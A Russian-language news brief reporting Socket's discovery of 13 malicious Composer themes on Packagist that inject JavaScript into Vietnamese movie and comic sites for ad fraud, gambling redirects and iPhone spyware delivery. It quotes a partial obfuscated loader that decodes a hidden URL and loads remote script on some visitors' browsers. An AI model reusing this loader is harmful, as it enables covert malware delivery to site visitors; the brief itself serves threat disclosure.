▤ Разбор
Исследователи Socket обнаружили 13 вредоносных тем Composer на Packagist, которые внедряют JavaScript на сайты с фильмами и комиксами во Вьетнаме. Вредоносный код выполняет две операции: запускает цепочку мошенничества с рекламой и перенаправлением на азартные игры, а также устанавливает шпионское ПО на iPhone через эксплойт WebKit-to-kernel.
Apple подтвердила, что уязвимость ядра была исправлена до получения отчёта, а точки входа WebKit общедоступны и внесены в каталог CISA "Уязвимости, эксплуатируемые прямо сейчас" (KEV). Ранее исследователи Socket сообщали о шести темах под одним вендором (ophimcms), теперь подтверждённый набор расширен до 13 пакетов от пяти вендоров.
ⓘ Что такое Composer
Composer — это инструмент управления зависимостями для PHP. Он позволяет разработчикам указывать, какие библиотеки нужны их проекту, и устанавливать их. Вредоносные темы Composer, обнаруженные исследователями, представляют собой пакеты, которые злоумышленники модифицировали, чтобы внедрить вредоносный JavaScript на сайты, использующие эти темы.
eval('window')['KuCbGF']=function(){ (function(u,r,w,d,f,c){
var x = iScfnleC; u = decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));
var s = d.createElement('script'); s.src=u; d.getElementsByTagName('head')[0].appendChild(s)
})('aHR0cHM6Ly91bmlvbi5tYWNvbXMubGEvanF1ZXJ5Lm1pbi0zLjYuOC5qcw==', ...) };
if( !(/^Mac|Win/.test(navigator.platform)) && (document.referrer.indexOf('.') !== -1) ) KuCbGF();Источник: Socket
@cbunit